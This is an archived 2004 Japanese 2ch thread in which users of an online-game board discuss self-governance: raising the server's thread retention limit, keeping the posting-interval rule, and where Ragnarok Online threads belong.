5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ネトゲ実況2板自治新党その1

1 :ヽ(`Д´)ノ ウワァァァン:04/08/09 00:26 ID:zaadE4Er
▼スレの趣旨
ネトゲ実況2自治の本スレ。
誰でも広い心で受け入れ、楽しいネトゲサロン板を目指して熱い議論をする場。

▼関連スレ
ネトゲサロン板自治新党その5
http://game8.2ch.net/test/read.cgi/mmosaloon/1091294186/

2 :ヽ(`Д´)ノ ウワァァァン:04/08/09 00:27 ID:zaadE4Er
▼ネトゲサロンその1より抜粋
> 1 :和風 ◆SIMPLE/OPE :04/03/12 19:58 ID:XiOY6tKa
> 管理人と協議の結果
>
> ネトゲサロン板での晒し叩きのキャラウォッチは禁止になりました。
> どうしても続けるのならネットウォッチ板でどうぞ。
>
> ネットwatch
> http://ex2.2ch.net/net/

> 2 :ひろゆき@どうやら管理人 ★ :04/03/12 20:00 ID:???
> 消しまくり。消しまくり。

> 3 :和風 ◆SIMPLE/OPE :04/03/12 20:05 ID:XiOY6tKa
> と、いうことで今後消しまくられるので、住人さんは心してくださいませ。

> 4 :和風 ◆SIMPLE/OPE :04/03/12 20:10 ID:XiOY6tKa
> ひとつ言い忘れたことがありました。
> 他のネットゲーム系の板でも同様に消しまくりです。

3 :ヽ(`Д´)ノ ウワァァァン:04/08/09 00:29 ID:zaadE4Er
▼ネトゲサロンその2より抜粋
> 540 :ネトゲ廃人@名無し :04/07/13 06:03 ID:???
> 要するに
> 1に晒し禁止と書いてあったらスレ削除は却下って事か

> 541 :ネトゲ廃人@名無し :04/07/13 06:15 ID:???
> 1っていうかテンプレにだろ

> 542 :ネトゲ廃人@名無し :04/07/13 06:58 ID:???
> 天麩羅に晒し禁止のような項目を入れれば
> 実際に晒しスレであろうともお咎めなしと。

> 543 :ネトゲ廃人@名無し :04/07/13 09:13 ID:???
> まあそうだろうな。
> 晒せばスレ削除になるなら、潰したいスレで晒せばいいわけだしな。

4 :ヽ(`Д´)ノ ウワァァァン:04/08/09 00:30 ID:zaadE4Er
▼スレの趣旨
ネトゲ実況2板自治の本スレ。
誰でも広い心で受け入れ、楽しいネトゲ実況2板を目指して熱い議論をする場。

>>1のテンプレ訂正
すまんすまん

5 :ヽ(`Д´)ノ ウワァァァン:04/08/09 00:59 ID:EPQQxHd7
この系統のスレを見るのは3回目だ
全部落ちたけどな

6 :ヽ(`Д´)ノ ウワァァァン:04/08/09 04:09 ID:8K03+5+K
人口が多くて実況に近い進行速度を叩き出すものが多いRO関連スレはどこの板も持て余し気味。
ゆえにこの板をネトゲ各板に散らばったROスレを迎え入れて専用板として再スタートさせると仮定すると…
スレ保有数とLRの変更さえ実現すれば、あとは専用板正式決定を前面に押し立てての誘導で解決ってところか。

RO住人よ、ここをRO専用板として正式に稼動させてみないか?

7 :ヽ(`Д´)ノ ウワァァァン:04/08/09 07:06 ID:dPXtaHu8
RO住人に自治なんて言葉はありえない( 'A`)

8 :ヽ(`Д´)ノ ウワァァァン:04/08/09 07:11 ID:KjAdVQjj
本スレを追い出さない限りどんな自治もローカルルールも無理。

9 :ヽ(`Д´)ノ ウワァァァン:04/08/09 08:33 ID:9nNPrQkY
本ヌレ=自治スレッド

10 :ヽ(`Д´)ノ ウワァァァン:04/08/09 13:35 ID:ki+KgAt+
RO関係を全部ここにもって来る場合の最大の問題点があります
それは圧縮基準が36スレッドであること
36スレでは確実にあふれるのは確実

参考
http://game7.2ch.net/kakolog.html

11 :ヽ(`Д´)ノ ウワァァァン:04/08/09 18:24 ID:NaanmShs
運営情報板にbanana227スレを立てて、SETTING.TXT変更に留まらない
いろいろな要望をしようという動きが、ネトゲ実況の自治スレを中心に出始めています。

・現在30弱しかないスレ保持数の増加
・主にネトゲ実況で見られるスレ乱立問題の対処
・その他板の役割などに関する議論

これらについて各板からの意見・要望がある程度まとまったら、スレを立てようかと。
とりあえずネトゲカテゴリ 共同自治スレ vol.1
http://game8.2ch.net/test/read.cgi/mmo/1055711932/
で足並みが揃えられたらと考えてます。

ちなみにbanana227.maido3.comでは
ex6.2ch.net(移転したので板はないはず)
game7.2ch.net(ネトゲ速報 ネトゲ質問 ネトゲ実況 ネトゲ実況2 ネトゲ実況3)
が運用されてます。鯖の仕様変更で他カテゴリに気兼ねする必要はないのです。


12 :ヽ(`Д´)ノ ウワァァァン:04/08/09 21:18 ID:1yGtQkWq
ぶっちゃけこの板の住人は何の話し合いもしないよ。
そっちで勝手に決めてくれ。

13 :ヽ(`Д´)ノ ウワァァァン:04/08/10 00:22 ID:m+dAih5l
>>10
>>6で既に問題点出てるね

>>11
実況2の圧縮基準を500に設定してRO関連スレを全て収容すれば
少なくとも乱立問題の半分は解決すると思われ。

14 :ヽ(`Д´)ノ ウワァァァン:04/08/11 05:56 ID:zZmZ27dW
>>11がらみでスレ立てておきました
game7 ネ速ネ質ネ実123について語るスレ
http://ex5.2ch.net/test/read.cgi/accuse/1092170873/


15 :ヽ(`Д´)ノ ウワァァァン:04/08/11 20:51 ID:392WSgUW
>>14
ネトゲ実況2板住民として
3行以内でまとめるように言ってきた。

16 :ヽ(`Д´)ノ ウワァァァン:04/08/12 14:38 ID:3fo9WQiE
>>15
ネトゲ実況3の人にわかりやすくまとめていただきました。感謝。

今の位置づけはこんな感じです。
ネトゲ実況自治スレ(幅広い意見感想雑談を募集)
http://game7.2ch.net/test/read.cgi/ogame/1092271275/

ネトゲカテゴリ共同自治スレ(メイン活動はこちらで)
http://game8.2ch.net/test/read.cgi/mmo/1055711932/

game7 ネ速ネ質ネ実123について語るスレ(案の叩き台を報告)
http://ex5.2ch.net/test/read.cgi/accuse/1092170873/

17 :ヽ(`Д´)ノ ウワァァァン:04/08/12 16:52 ID:7GNOL07F
自治新党まんせー

18 :ヽ(`Д´)ノ ウワァァァン:04/08/14 15:31 ID:l35XB81l
>>16
なんか気の遠くなる話だね
付いていけないよあたしゃ

19 :ヽ(`Д´)ノ ウワァァァン:04/08/16 07:18 ID:cPLCMyL7
>>16
ネトゲ実況自治スレ(幅広い意見感想雑談を募集)
http://game7.2ch.net/test/read.cgi/ogame/1092271275/ 落ちてる

ネトゲカテゴリ共同自治スレ(メイン活動はこちらで)
http://game8.2ch.net/test/read.cgi/mmo/1055711932/

game7 ネ速ネ質ネ実123について語るスレ(案の叩き台を報告)
http://ex5.2ch.net/test/read.cgi/accuse/1092170873/ 落ちてる

20 :ヽ(`Д´)ノ ウワァァァン:04/08/16 07:30 ID:UIM3ib0Q
大体何を決めたいんだよ
人集めて話し合いさせたいんならまずその辺簡単にまとめてここに書かないか?
落ちててる過去スレ貼って嫁とかじゃなくてさ

21 :ヽ(`Д´)ノ ウワァァァン:04/08/16 10:21 ID:749M159i
ネトゲサロンから出てこなくていいよ。

22 :ヽ(`Д´)ノ ウワァァァン:04/08/16 11:51 ID:v0zUDbZt
もう自治スレなんて時代遅れですよ、荒らしさん?

23 :ヽ(`Д´)ノ ウワァァァン:04/08/17 17:26 ID:aQykjU+J
ネトゲサロン等の他のネトゲ系板の惨状を打開するために
各ネトゲ系板の連携体制が必要な気がする

サロン自治スレから
・実況2を「実況2」→「人気MMO」に板名変更してほしい
との要望有り
この板名変更に関して、実況2自治で相談しませんか?

24 :ヽ(`Д´)ノ ウワァァァン:04/08/17 17:41 ID:MYe0DlJ4
>>23
それはネトゲサロンのためなのだから、そっちの自治スレと板分割でやったら?
需要があればだけど

■ 板分割 ご相談所-Part7
http://qb5.2ch.net/test/read.cgi/operate/1054870168/

25 :ヽ(`Д´)ノ ウワァァァン:04/08/17 19:57 ID:7WTLKEx1
連投制限のせいで
実況2で実況は実質できないしな

26 :ヽ(`Д´)ノ ウワァァァン:04/08/18 01:18 ID:lSQMBiON
☆☆☆自治スレ@ネ実☆☆☆
http://game7.2ch.net/test/read.cgi/ogame/1092747232/
>>19の前々スレ、前スレは共に1000を迎え、新スレになりました。

現在game7鯖全体の仕様変更に関わる案としては
・保持数(現在36を越えたら36に圧縮)の増加。
 保持数と圧縮開始数の幅を設けて、落ちるまでに一定の時間をかけたい、等。

・samba規制(現在45秒)の緩和
 スレ立てのテンプレ貼り等で引っかかる場合があり、鯖の負担の軽さにしては
 多い設定なので、少し減らす方向で。
>>1のみホスト情報を表示
 無為なスレ立て抑制の一環。
・スレ立て申請制
・即死機能
 30レス以下あるいは980レス以上のスレが24時間以上書き込みがないと
 dat落ちする、というような機能。レス数と時間は変更可能。

等が上がっております。鯖全体の仕様変更に関わる仕様変更を視野に入れた
議論をしてますので、そう言う動きが続いてるという事を報告しておきます。

27 :ヽ(`Д´)ノ ウワァァァン:04/08/18 09:22 ID:gkVkA9qJ
スレ立ての申請制はイラネ
ホスト情報でスレ立て規制するだけでいいんじゃね?

あとはいいと思う

28 :ヽ(`Д´)ノ ウワァァァン:04/08/19 03:26 ID:2S1nWF/7
保持数だけあげればあとは何も弄らないでいいし

29 :ヽ(`Д´)ノ ウワァァァン:04/08/19 16:04 ID:PVvA89pJ
板名変更を申請してみる
板名は:人気MMO板
希望

30 :ヽ(`Д´)ノ ウワァァァン:04/08/19 16:34 ID:59KuFaD2
名無し欄いいなぁ。。。そういうのほしいなぁ。。byネ実。。

31 :ヽ(`Д´)ノ ウワァァァン:04/08/19 18:51 ID:2S1nWF/7
>>29
よけーなことすんな

32 :ネ実自治スレ:04/08/19 23:35 ID:5Td053H4
ネ実1の自治スレのものですが、お願いがあり伺いました。

現在、ネ実ではスレ乱立抑制および他板での住民の板違いスレを防ぐため、、
以下のような変更を申請しようと協議しております。
その際、手続き等はネ実のほうで実行しようと思っておりますが、
変更箇所が板毎ではなく、鯖単位になる(収容板全てが同じ設定に変更される)ので、
お手数かけますが、関係各板の方々に協議をお願いしたく思います。
なお、逐次各板の自治スレは拝見しておりますが、手違いがあるとまずいので、
結果が固まりましたら、念のためネ実自治スレのほうに書き込みお願いいたします。

  ○変更内容

    1.板毎スレ保有数の増枠と、圧縮前マージンの設定変更
    2.連続書き込み規制45秒の短縮

※詳しい内容については、次レス。

33 :ネ実自治スレ:04/08/19 23:35 ID:5Td053H4
詳細:1.板毎スレ最大保有数の増枠

   現在 圧縮直後/最大 36/36

⇒ 50/70 80/100 150/200等

※具体的な数字は 70〜200 の間で調整中ですので、
 このくらいの増枠なら問題ないという範囲を協議お願いします。
 
  例) 50/70の場合
  
    最大70スレ収容、71スレ目がたった時点でdat落ち判定開始。
    放置されているスレから20スレdat落ち ⇒ 50へ
    
  目的
    スレ落ち速度を抑制して、FF関連のスレをネ実で確実に収容する。
    
  協議をお願いしたい内容(2点)
    ・以上のような変更を申請してもよいかどうか。
    ・申請する場合、増枠数はどこまでOKか(直後/最大)

34 :ネ実自治スレ:04/08/19 23:36 ID:5Td053H4
詳細:2.連続書き込み規制45秒の短縮

   現在1度書き込んでから45秒の間をあけないと、
   次の書き込みを行うことができません。
   これを、20秒〜30秒に短縮する。

  目的
    書き込み利便

  協議をお願いしたい内容(2点)
    ・以上のような変更を申請してもよいかどうか。
    ・申請する場合、具体的な秒数はどのくらいがよいか。

こちらはついでにという話です。
他板で特にかえる必要がないということであれば、見送る予定です。

35 :ヽ(`Д´)ノ ウワァァァン:04/08/19 23:56 ID:MOGTClVG
この板のローカルルール初めて見たけど、ラグナロクのラの字もないのな。
スレ違いもへったくれもないじゃん。

36 :ヽ(`Д´)ノ ウワァァァン:04/08/22 13:35 ID:385LCDs+
まーな

37 :ヽ(`Д´)ノ ウワァァァン:04/08/22 18:14 ID:dq9Z7O9R
収集のつかないゲームの隔離場所だからな

38 :ヽ(`Д´)ノ ウワァァァン:04/08/22 21:27 ID:UP0L9tEV
ネ実1みたいに、自治で決めてくしかあるまいて。スレが増えるなら喜ばしいこと。。

39 :ヽ(`Д´)ノ ウワァァァン:04/08/23 02:29 ID:pqa0uud8
スレ保持数が増える分には問題ないわな

40 :ヽ(`Д´)ノ ウワァァァン:04/08/23 04:28 ID:ynfJ6F1j
緩くするのには何ら問題ない

41 :ヽ(`Д´)ノ ウワァァァン:04/08/25 04:38 ID:DKjJ+Kix
楽しくいこうぜー

42 :ヽ(`Д´)ノ ウワァァァン:04/08/29 18:06 ID:GMduA2HC
スレ数が増えれば楽になるかな

43 :ネ実自治スレ:04/08/29 22:23 ID:VRjF+YJI
たびたびすいません、ネ実自治スレです。

先日協議お願いした件について、
お時間のとっていただいてありがとうございます。
さて、どんな感じでしょうか?
もし、大体がた結論のほうまとまっていらっしゃいましたら、
お手数申し訳ございませんが、ネ実のほうに書き込みお願いしたく、
お伺いいたしました。
ご面倒おかけいたしますが、また、大変失礼なお願いですが、
誤解行き違いすれ違い極力さけたいと思いますので、書き込みのほうよろしくお願いいたします。
なお、増枠については、具体的な限界数字をいただければ幸いです。


44 :ネ実自治スレ:04/08/30 00:15 ID:u/E9a1la
>>322
と、申し訳ない。
せっかく書き込みしていただいたのですが、
できれば、同じ内容をネ実2の自治スレに書いていただけたらと思います。

勝手に拝見させてもらっておりますが、
その意見はネ実2でもまだでていない、新しい意見とお見受け。
できれば、ネ実2のほうで協議ねがえたらと思います。

失礼ながら、よろしくお願いします。

45 :ネ実自治スレ:04/08/30 00:15 ID:u/E9a1la
まちがい。。誤爆です。。。ORZ
すいませんでした。。。

46 :ネ実自治スレ:04/08/30 00:16 ID:u/E9a1la
ああ・・>>44 は誤爆。 >>43は、誤爆でありません。
>>43お願いいたします。

す、すいません。。。

47 :ヽ(`Д´)ノ ウワァァァン:04/08/30 00:20 ID:nEtUoFCX
ネ実は速度の割りに不毛なので相手にしづらい
俺は共同自治で纏めるのにこの板の意見が必要なときまで動く必要ないと思う

48 :ヽ(`Д´)ノ ウワァァァン:04/08/30 00:33 ID:ApcksSVG
ttp://game7.2ch.net/test/read.cgi/ogame/1093570732/322です
>44とのことなので一応こっちにも書いておきます
-----------------
実況2から来ました
・実況板のスレ保持数がなんで3桁もいるん?
 ただ、質問板も同居しているので50位はあってもいいかと思うです(50/50)
・samba値減らすと(書込み増で)鯖負荷増える悪寒

そもそもgame7は実況チューニングなんすか?
長らく運用情報いってないからわかりません
-----------------

49 :ヽ(`Д´)ノ ウワァァァン:04/08/30 00:45 ID:nWopPV1D
不毛は同意だが、そのこの板の意見を今もとめられてんちゃうんか?
手順ふんできてんだから、一応きっちりかえしてやろうぜ。

保持数はあえて言うなら80/100。まあ多くてもいいよ。
実況板って名前ついてるけど、どこも実質雑談板だし。
sambaは現状維持希望。
荒らしに餌あたえるだけ。

50 :ヽ(`Д´)ノ ウワァァァン:04/08/30 04:34 ID:mjPPzjQc
Sambaや保持数は、よくわからんが同居する鯖の全板共通なんだろ。

保持数は多い方がいいに決まってるし、Sambaは少ない方がいいに決まってる。
荒らしは、気になる奴が削除依頼と規制報告すればいいべ。

ただ鯖を潰しちゃ元も子もないので、実感・体感としてわかってる奴が
少しずつ調整してくれよな。

51 :ヽ(`Д´)ノ ウワァァァン:04/08/31 08:36 ID:Y9fbsKfx
多いだけ多いほうがいいって人と50/50の人がいるな。
どーすんだ?

52 :ヽ(`Д´)ノ ウワァァァン:04/08/31 09:46 ID:sjRzzIMN
本スレ+その他長寿スレが落ちなければどうでも良い

53 :ヽ(`Д´)ノ ウワァァァン:04/08/31 10:12 ID:FOeH/Vzf
>>51
他の板の出した数字にあわせてるのだと思われ
あまりにとっぴな数字を出しても他の板が首を振るだけだし

54 :ヽ(`Д´)ノ ウワァァァン:04/08/31 15:17 ID:KkItSQR6
勝手に板しきってんなよ
実質的にROスレが多くてもこの板はROスレの為に出来た板じゃなくて
 隔 離 施 設 で す
RO系が多いのはホンヌレがRO本スレだったころに
周りに迷惑掛け捲って叩かれたりしたからこっちに移った
その際に他の関連スレもついてきただけ
RO系スレは存在自体罪なのにRO板作ろうだなんておこがましいんですよ
RO板が欲しいならにゅ缶にいけばいいじゃない

>>1 >>4
>楽しいネトゲ実況2板を目指して
お前初めから釣る気まんまんですね

55 :ヽ(`Д´)ノ ウワァァァン:04/08/31 15:19 ID:Y9fbsKfx
>>54
脈略がさっぱりわからんのだが。

56 :ヽ(`Д´)ノ ウワァァァン:04/08/31 15:28 ID:KkItSQR6
大体ここにRO系スレ集約させてみろ
自治も出来ないほどの混沌がくるぞ
集約ってことは晒し叩き升BOTもなんでもありってことだろ?
まさか気に食わないスレだけ除いて集約だなんて言わないよな?

あと、板名も「人気MMO」に変えるだぁ?
それはROが唯一の人気MMOだと信じて疑わない患者の発言ですか?
変えた途端にFFやらリネやらの人気MMOのスレが参入してとても賑やかになりそうですね

>>55 色々語句省いて書き込んでるから上手に補完して

57 :ヽ(`Д´)ノ ウワァァァン:04/08/31 15:37 ID:iCu5vAJl
いきなりどうした?

58 :ヽ(`Д´)ノ ウワァァァン:04/08/31 16:04 ID:Y9fbsKfx
ネ実の協議依頼の話をしていたはずだが・・?

59 :ヽ(`Д´)ノ ウワァァァン:04/08/31 16:59 ID:aOtdfXPx
色んな意見があって然るべきでしょ
そろそろ9月ですよ

60 :ヽ(`Д´)ノ ウワァァァン:04/08/31 17:22 ID:Y9fbsKfx
ああ、上の方の専用板の話をしているのか。なっとく。
私はここ隔離板だと思ってるから専用はたしかにどーかと。
ただまあ、隔離としてもスレ数少ない気がするから、増やすなら50/70で様子みるんでいんじゃね?

61 :ヽ(`Д´)ノ ウワァァァン:04/08/31 20:44 ID:6n86EbRR
ああ、保持数を上げるのには全然問題はないな。
サンバ規制やらが実況板のクセにやたら厳しいのはまあ仕方がないだろうな。


62 :ヽ(`Д´)ノ ウワァァァン:04/08/31 23:58 ID:ClwPdjZp
sambaについてはいかんせんbananaっていうのが尾を引くかも。。。
実況chカテゴリの板はpekoかcobraだよね?

63 :ヽ(`Д´)ノ ウワァァァン:04/09/01 09:00 ID:QkpBKWxj
保持数は70/70~80くらい(現状のほぼ倍)
sambaは20~30sec程度にして、連投荒らしの出る板は
timecloseをあげてもらうというのはどうだろうか

64 :ヽ(`Д´)ノ ウワァァァン:04/09/01 09:08 ID:TTln+DPa
timecloseってなんじゃら?

65 :ヽ(`Д´)ノ ウワァァァン:04/09/01 10:59 ID:QkpBKWxj
あげるのはtimecountだったわさ
>64
ttp://game7.2ch.net/ogame2/SETTING.TXTの項目
板全体で最新timecount回の投稿のうち同一ホストからはtimeclose回しか投稿できない
ここは32回中3回発言できる

66 :ヽ(`Д´)ノ ウワァァァン:04/09/01 11:23 ID:TTln+DPa
>>65
なるほどなっとく。
しかし、それだと過疎スレで1,2名で細々やってるスレが……て、そんなスレにはsambaも何もないか。
どっちでもいいっぽ。
ただ、45秒で困ったことは実は私はないとか言ってみる。

67 :ヽ(`Д´)ノ ウワァァァン:04/09/01 13:51 ID:SGOEerJY
ま、現状ここの回答が最後だし、
いくつでもいいから早く回答してあげたほうがいいんじゃないか?
なんか見てきたらネ実の自治スレ落ちてるしw

結局いくつで言っても50/70 sambaは現状維持で決まりそうだけどなー
いんじゃね50/50 現状維持で言っちゃって

68 :ヽ(`Д´)ノ ウワァァァン:04/09/04 08:17 ID:SgEs/u5y
書き込み規制は現状維持か?
増枠どうする?
意見止まってるけど・・・

69 :ヽ(`Д´)ノ ウワァァァン:04/09/04 17:05 ID:ByPspCax
50/50なん?50/70でなくって?
どっちでもいいけど。

70 :ヽ(`Д´)ノ ウワァァァン:04/09/04 19:30 ID:qQOYE8Ar
50/70でいいんでないかい

71 :ヽ(`Д´)ノ ウワァァァン:04/09/04 19:51 ID:ByPspCax
というかそろそろ誰か書きにいってやれよw

72 :ヽ(`Д´)ノ ウワァァァン:04/09/04 21:19 ID:TJV6huFR
あのスレ無駄に流れるから嫌い

73 :ヽ(`Д´)ノ ウワァァァン:04/09/05 01:21 ID:JOwCsA6S
読んでる人はスレ進行激速でも読んでると思いますよ。
そうでないと、こんなレスはつかんだろうし、
http://game8.2ch.net/test/read.cgi/mmo/1055711932/547 (共同自治スレ)
こんなまとめサイトは出来てこないだろうし。
http://www.freebbs.biz/tree/treebbs.cgi?user=1318

そろそろネ実の自治スレ死守してる人がかわいそうなんで・・・・・・。

スレ保持数 50/70 
samba秒数 現状維持希望

でファイナルアンサーでよろしいでしょうか?

74 :ヽ(`Д´)ノ ウワァァァン:04/09/05 02:04 ID:rATwbSIz
>>73
いいよ
一番厄介な板なのにご苦労さん

75 :ヽ(`Д´)ノ ウワァァァン:04/09/05 02:38 ID:JOwCsA6S
それでは・・・下記内容でネ実の自治スレに書き込みしておきます。
------------------------------
ネトゲ実況2板自治スレの者です。
スレ保持数・samba秒数ですが、

スレ保持数 50/70 
samba秒数 現状維持希望
でお願いします。
(※ここに、このスレッドのレスリンクをしておきます。)
------------------------------
議論お疲れ様でした。

76 :ネ実1自治スレ:04/09/05 11:59 ID:8hBh4ixM

ネトゲ実況1の自治スレへ書き込みありがとうございます。
お手数かけて申し訳こざいませんでした。

 スレ保持数 50/70
 samba秒数 現状維持(45秒)

2点了解です。
協議時間とっていただいたありがとうございます。

数字のほう出揃いましたので、実況2自治スレさんの書き込みも拝見させてもらい、
参考にしつつ、煮詰めていきたいと思います。
ありがとうございました。

77 :ネ実1自治スレ:04/09/05 22:12 ID:8hBh4ixM
たびたび失礼いたします。ネ実1自治スレです。

他板さますべてから回答を頂戴いたしました。
 http://game7.2ch.net/test/read.cgi/ogame/1094278472/79
 
 総論としては、
   ・保持数:50/70で様子を見てほしい
   ・samba規制:現状維持(45秒)希望

 といった感じでしたので、ネ実自治スレとしても、
 今回は
   ・増枠50/70にて申請 → 受理後様子をみる。
   ・sambaについては申請を見送り。

 といった形で進めて行きたいと思います。
 
協議時間等、取り計らいありがとうございました。


78 :ヽ(`Д´)ノ ウワァァァン:04/09/06 07:02 ID:1CnSoP7h
>>76-77
乙ー

79 :ヽ(`Д´)ノ ウワァァァン:04/09/11 14:00:10 ID:ibN914A7
◆新機能をねだるスレ@運用情報◆
http://qb5.2ch.net/test/read.cgi/operate/1090875736/325-327
---
327 名前:留守番 ★ :04/09/10 20:52:11 ID:???

>>325

どの板でも出来るようになった。
最新版の bbs.cgi と 板の設定変更cgi を全サーバに配れば
開始可能でーす

ただし 設定用のcgi が私の知っているやつだったらの話しですが、、
---

1001が全板VITクオリティ可能に

80 :ヽ(`Д´)ノ ウワァァァン:04/09/13 17:33:19 ID:JgtBp7CL
79が似非VIP住人だということはわかった

81 :ヽ(`Д´)ノ ウワァァァン:04/09/14 23:05:54 ID:wvh+kJb9
何こんなとこが仕切ってんだよ

82 :ヽ(`Д´)ノ ウワァァァン:04/09/14 23:12:35 ID:+PJpdJGq
どこにも連絡せずに何勝手に決めてんだ?
大体ネ実2になんで50/70も必要なんだよ
そんなことしてもどうせRO系スレで埋めるだけだろ
今この板にあるスレの半分はにゅ患向けじゃないか

83 :ヽ(`Д´)ノ ウワァァァン:04/09/15 01:07:25 ID:2Q/WFUad
>>82
却下されてるから大丈夫だよ

84 :ヽ(`Д´)ノ ウワァァァン:04/09/15 21:17:16 ID:ZjLCp4dh
つーか、板の空気読めよ。
この板に本ヌレ以外何一ついらん。
まず最初にROの話題厳禁にしろ。そうすりゃスレ数なんて5以内で済む。

85 :ヽ(`Д´)ノ ウワァァァン:04/09/17 10:18:32 ID:tq6igdCN
この板だけじゃなくて鯖全体の方針な

86 :ヽ(`Д´)ノ ウワァァァン:04/09/17 10:56:32 ID:PJ0xnj0A
>>84
それは駄目だ。ROの話題を禁止にしたら、本スレの存在意義がなくなるだろうが。
ラウンジに移動したいなら大いに賛成だがな。それくらい考えろや糞が。


87 :ヽ(`Д´)ノ ウワァァァン:04/09/17 12:52:43 ID:RuBShBFT
ぉぃぉぃ('A`;)ホンヌレ住人ならgdgd決めようぜ
とりあえずスレ保持数が増えても今更質問スレとか立つわけじゃないし
連投規制はそのままみたいだけどぶっちゃけ

なにもかわらんじゃろ

88 :ヽ(`Д´)ノ ウワァァァン:04/09/18 06:20:02 ID:TBe+Mpro
そんなことより
なんで愚痴スレがにゅ患から飛び出してきてるんだよ
患者はネ実2にくんなよ

89 :ヽ(`Д´)ノ ウワァァァン:04/09/18 17:45:38 ID:rJOQ64PF
ROの話題を禁止にできないんなら本ヌレを別の板に移動させてネ実2は閉鎖させればいいだろ。

90 :ヽ(`Д´)ノ ウワァァァン:04/09/19 15:38:02 ID:bcWwBJ2g
この中に本ヌレ住人はどれだけ居るのやら。

91 :ヽ(`Д´)ノ ウワァァァン:04/09/25 11:21:16 ID:vbROJpPn
>>89
閉鎖しなくてもいーじゃん

92 :ヽ(`Д´)ノ ウワァァァン:04/09/25 12:02:10 ID:yLQsb65y
別にROスレあってもいいだろ
なにをそんなに嫌がってるんだ
同族嫌悪か?

93 :ヽ(`Д´)ノ ウワァァァン:04/09/25 19:05:36 ID:Q78q+XnU
ちょっと見てみたけど、愚痴スレはあってもいいと思う


ただ、厨はお帰りください
どうせ廃だろうな
ROしか見えなくなってる奴

94 :ネ実1自治スレ:04/09/27 04:51:27 ID:Xkwcftpk
先日協議をお願いした増枠の件ですが、
以下のように申請受理されましたので、ご連絡差し上げます。

変更前 36スレ限界、37スレ目で圧縮開始、37スレ以上はdat落ち、完了後は36スレに。
変更後 70スレ限界、71スレ目で圧縮開始、50スレ以上はdat落ち、完了後は50スレに。

その節はお世話になりました。
これで様子見をしたいと思います。
色々ありがとうございました。


関連スレおよび資料

 【game7】banana227鯖運用スレ【ex6】
  http://qb5.2ch.net/test/read.cgi/operate/1096130146/

 ネ実自治マトメサイト(仮)
  ttp://www.freebbs.biz/tree/treebbs.cgi?user=1318


95 :ヽ(`Д´)ノ ウワァァァン:04/09/28 01:17:29 ID:HFiE4hA7
>94
ういー

96 :ヽ(`Д´)ノ ウワァァァン:04/09/30 21:15:09 ID:sq76zevE
この板はどう見ても30以上に増えないのだが
俺何か勘違いしてる?

97 :ヽ(`Д´)ノ ウワァァァン:04/09/30 22:30:19 ID:U5Fg4rKS
30超える勢いでスレ立ててないだけだろ

98 :ヽ(`Д´)ノ ウワァァァン:04/10/01 13:14:43 ID:SpTNp8yK
普通はスレ数限界までいかないもんだよ。
圧縮おきたら、うわぁぁぁ圧縮おきたぁぁ……て、叫ぶもの。

99 :ヽ(`Д´)ノ ウワァァァン:04/10/03 15:54:06 ID:amHHbpov
圧縮まだぁ?

100 :ヽ(`Д´)ノ ウワァァァン:04/10/03 16:54:26 ID:K4cbfGGG
聴牌っていまどこ?

101 :ヽ(`Д´)ノ ウワァァァン:04/10/06 05:33:14 ID:nd0iCGjj
>>100 さぁ?

102 :ヽ(`Д´)ノ ウワァァァン:04/10/07 01:30:19 ID:fQE4else
いい加減本ヌレをラウンコ辺りに強制移動すりゃいいんだよな。
『RO話題を禁止したらこの板に住めなくなる、けれど実際にRO話題したらうざがられる』
何このgdgd。何がRealOnlineだよ集団荒らし共('A`)
管理人が強制的にラウンコにスレ移動してくれれば、俺も含めて踏ん切りも付くと思うんだよな。

103 :ヽ(`Д´)ノ ウワァァァン:04/10/07 01:31:53 ID:df468mt7
まぁ ROの話してないしな、あそこ

104 :ヽ(`Д´)ノ ウワァァァン:04/10/07 01:58:02 ID:wVQntuPT
運営のどっかに言ってみれば?
はっきり言ってこのままじゃ板が勿体無いよ

105 :ヽ(`Д´)ノ ウワァァァン:04/10/07 03:39:48 ID:lZ9ADTN1
>>102
そこまで不満に思ってるのが一人じゃ移動の理由にゃ弱いだろ
というかいつまで根に持ってるんだってのが正直な印象

ラグナロク関連がラウンジに移動したとして、その後ネ実2はどう使われるんだ?

106 :ヽ(`Д´)ノ ウワァァァン:04/10/07 03:59:00 ID:fQE4else
俺が言ってるのはRO関連じゃない、『本ヌレ』だ。あのスレのどこにROが関連しているというのだ('A`)
本ヌレさえラウンジに移動させれば、新たな『RO本スレ』と、RO隔離としてフル活用されたネトゲ実況2が見れるだろうよ。
出来れば鯖別のキモスレもこっちに持ってきたいんだが、ネトゲカテゴリ内の全てにおいて晒し禁止なんてアフォな状態だしな。
そこから変えてほしいんだが…まぁ、俺一人じゃ無理だよな。そもそもこのスレ見てるヤシ10人いねーだろ('A`)

107 :ヽ(`Д´)ノ ウワァァァン:04/10/07 06:57:25 ID:lZ9ADTN1
いつかお前の言う通りになるといいな

108 :ヽ(`Д´)ノ ウワァァァン:04/10/07 21:36:28 ID:5ExRpP1e
削除依頼だせよー

109 :ヽ(`Д´)ノ ウワァァァン:04/10/07 22:38:31 ID:m+q7zt70
>>106
同士よ。俺も本ヌレ住民だが、素直にそう思うぞ('A`)
「ROの話題をすると荒れるからするな」とかいうのはさすがにな・・・
別にラウンジに行っても全然問題ないと思うんだが。
むしろ行けよ、みたいな。別に俺は雑談できるならどこ行ってもいいよ('A`)

110 :ヽ(`Д´)ノ ウワァァァン:04/10/08 16:21:37 ID:l0yrI+Oe
だからにゅ患住人になればいいじゃない
あっちの雑談スレに住めば何でも言えるぞ

111 :ヽ(`Д´)ノ ウワァァァン:04/10/08 18:21:27 ID:pN2QvmFs
自分と違う意見を持った者には「少数意見」だの「空気読め」だので逃げる。
これが本ヌレのジャスティス('A`)b

112 :ヽ(`Д´)ノ ウワァァァン:04/10/08 20:44:46 ID:ui8zT6D5
にゅ患?2chスクリプトを使ってるとはいえ、2chとはまったく関係ないファンサイトの名前が出てくる理由はなんだ?('A`)
物凄い勢いで鯖に負担かけてる雑談スレがネトゲカテゴリにいる理由にはならんだろ

113 :109:04/10/08 20:46:27 ID:PvMKzFc/
なにが楽しくてにゅ患の奴等と雑談しなけりゃなんねーんだよ('A`)
端から見れば似たようなもんかもしれんがな、
俺は本ヌレの独特なコミュニティが好きなんだよ。
本ヌレの雰囲気をにゅ患に持ち込めるなら別ににゅ患だろうが何だろうがどこでもいいんだがな。
わがままと思うか?だって俺は本ヌレ住民だもの。

